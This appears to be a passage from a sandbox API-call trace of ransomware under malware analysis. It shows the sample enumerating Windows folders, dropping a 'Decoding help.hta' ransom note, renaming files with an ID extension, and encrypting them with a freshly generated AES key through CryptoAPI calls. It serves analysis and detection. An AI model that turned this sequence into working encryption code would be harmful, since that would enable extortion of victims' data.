ftLastAccessTime.dwLowDateTime=0xb3dda83b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3dda83b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tpcps.dll", cAlternateFileName="")) returned 1 [0059.383] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.383] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.383] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0059.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0059.384] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tpcps.dll") returned -1 [0059.384] lstrlenW (lpString="tpcps.dll") returned 9 [0059.384] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.384] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.384] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="tpcps.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll" [0059.384] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll" [0059.384] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.384] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0059.384] lstrcmpW (lpString1=".", lpString2="tr-TR") returned -1 [0059.384] lstrcmpW (lpString1="..", lpString2="tr-TR") returned -1 [0059.384] lstrcmpiW (lpString1="windows", lpString2="tr-TR") returned 1 [0059.384] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.384] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.384] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="tr-TR" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR" [0059.384] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*.*" [0059.384] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0059.384] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x252ffff0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f0 [0059.385] CloseHandle (hObject=0x5f0) returned 1 [0059.385] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0059.385] lstrcmpW (lpString1=".", lpString2="uk-UA") returned -1 [0059.385] lstrcmpW (lpString1="..", lpString2="uk-UA") returned -1 [0059.385] lstrcmpiW (lpString1="windows", lpString2="uk-UA") returned 1 [0059.386] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.386] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.386] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="uk-UA" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA" [0059.386] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*.*" [0059.386] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0059.386] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24de6b88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f0 [0059.386] CloseHandle (hObject=0x5f0) returned 1 [0059.387] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0059.387] lstrcmpW (lpString1=".", lpString2="zh-CN") returned -1 [0059.387] lstrcmpW (lpString1="..", lpString2="zh-CN") returned -1 [0059.387] lstrcmpiW (lpString1="windows", lpString2="zh-CN") returned -1 [0059.387] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.387] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.387] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="zh-CN" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN" [0059.387] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*.*" [0059.387] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0059.387] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24db6ab8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f0 [0059.388] CloseHandle (hObject=0x5f0) returned 1 [0059.388] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0059.388] lstrcmpW (lpString1=".", lpString2="zh-TW") returned -1 [0059.388] lstrcmpW (lpString1="..", lpString2="zh-TW") returned -1 [0059.388] lstrcmpiW (lpString1="windows", lpString2="zh-TW") returned -1 [0059.388] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0059.388] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0059.388] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="zh-TW" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW" [0059.388] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*.*" [0059.388] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0059.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c602b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f0 [0059.389] CloseHandle (hObject=0x5f0) returned 1 [0059.389] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0059.389] FindClose (in: hFindFile=0x5db4f8 | out: hFindFile=0x5db4f8) returned 1 Thread: id = 288 os_tid = 0x784 [0042.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*", lpFindFileData=0x1431fd30 | out: lpFindFileData=0x1431fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db6f8 [0042.376] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.376] FindNextFileW (in: hFindFile=0x5db6f8, lpFindFileData=0x1431fd30 | out: lpFindFileData=0x1431fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.376] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.377] FindNextFileW (in: hFindFile=0x5db6f8, lpFindFileData=0x1431fd30 | out: lpFindFileData=0x1431fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad59fd00, ftCreationTime.dwHighDateTime=0x1ca9454, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad59fd00, ftLastWriteTime.dwHighDateTime=0x1ca9454, nFileSizeHigh=0x0, nFileSizeLow=0x665a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSCDM.DLL", cAlternateFileName="")) returned 1 [0042.377] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*" [0042.377] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*") returned 70 [0042.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\Decoding help.hta" [0042.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\decoding help.hta")) returned 0xffffffff [0042.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610 [0042.400] WriteFile (in: hFile=0x610, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1431fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1431fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.401] CloseHandle (hObject=0x610) returned 1 [0042.401] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.402] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSCDM.DLL") returned -1 [0042.402] lstrlenW (lpString="MSCDM.DLL") returned 9 [0042.402] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*" [0042.402] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*") returned 70 [0042.402] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\", lpString2="MSCDM.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" [0042.402] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" [0042.402] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0042.402] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.402] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610 [0042.403] CreateFileMappingA (hFile=0x610, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x614 [0042.403] CryptAcquireContextA (in: phProv=0x1431fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1431fcec*=0x34488b8) returned 1 [0042.403] CryptGenKey (in: hProv=0x34488b8, Algid=0x6610, dwFlags=0x1, phKey=0x1431fce8 | out: phKey=0x1431fce8*=0x5db8f8) returned 1 [0042.404] CryptExportKey (in: hKey=0x5db8f8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1431fbe4, pdwDataLen=0x1431fce4 | out: pbData=0x1431fbe4*, pdwDataLen=0x1431fce4*=0x2c) returned 1 [0042.404] MapViewOfFile (hFileMappingObject=0x614, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x665a0) returned 0x21520000 [0042.453] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1431fbe4*, pdwDataLen=0x1431fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1431fbe4*, pdwDataLen=0x1431fcf8*=0x100) returned 1 [0042.453] CryptEncrypt (in: hKey=0x5db8f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21520000, pdwDataLen=0x1431fce4*=0x665a0, dwBufLen=0x665a0 | out: pbData=0x21520000*, pdwDataLen=0x1431fce4*=0x665a0) returned 1 [0048.186] UnmapViewOfFile (lpBaseAddress=0x21520000) returned 1 [0048.356] CloseHandle (hObject=0x614) returned 1 [0048.356] CryptDestroyKey (hKey=0x5db8f8) returned 1 [0049.197] CryptReleaseContext (hProv=0x34488b8, dwFlags=0x0) returned 1 [0049.197] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.197] WriteFile (in: hFile=0x610, lpBuffer=0x1431fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1431fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1431fbe4*, lpNumberOfBytesWritten=0x1431fcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.052] WriteFile (in: hFile=0x610, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1431fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1431fcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.052] CloseHandle (hObject=0x610) returned 1 [0052.600] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0056.916] FindNextFileW (in: hFindFile=0x5db6f8, lpFindFileData=0x1431fd30 | out: lpFindFileData=0x1431fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad59fd00, ftCreationTime.dwHighDateTime=0x1ca9454, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad59fd00, ftLastWriteTime.dwHighDateTime=0x1ca9454, nFileSizeHigh=0x0, nFileSizeLow=0x665a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSCDM.DLL", cAlternateFileName="")) returned 0 [0056.916] FindClose (in: hFindFile=0x5db6f8 | out: hFindFile=0x5db6f8) returned 1 Thread: id = 289 os_tid = 0x77c [0042.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*", lpFindFileData=0x1445fd30 | out: lpFindFileData=0x1445fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db838 [0042.387] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.387] FindNextFileW (in: hFindFile=0x5db838, lpFindFileData=0x1445fd30 | out: lpFindFileData=0x1445fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.387] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.387] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.387] FindNextFileW (in: hFindFile=0x5db838, lpFindFileData=0x1445fd30 | out: lpFindFileData=0x1445fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0042.387] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0042.387] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0042.387] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0042.387] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*" [0042.387] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*") returned 61 [0042.387] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US" [0042.387] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*" [0042.387] GlobalMemoryStatus (in: lpBuffer=0x1445fd10 | out: lpBuffer=0x1445fd10) [0042.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9478660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f4 [0044.165] CloseHandle (hObject=0x5f4) returned 1 [0044.165] FindNextFileW (in: hFindFile=0x5db838, lpFindFileData=0x1445fd30 | out: lpFindFileData=0x1445fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830a4e7c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x830a4e7c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x830cafdd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5c800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0047.127] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 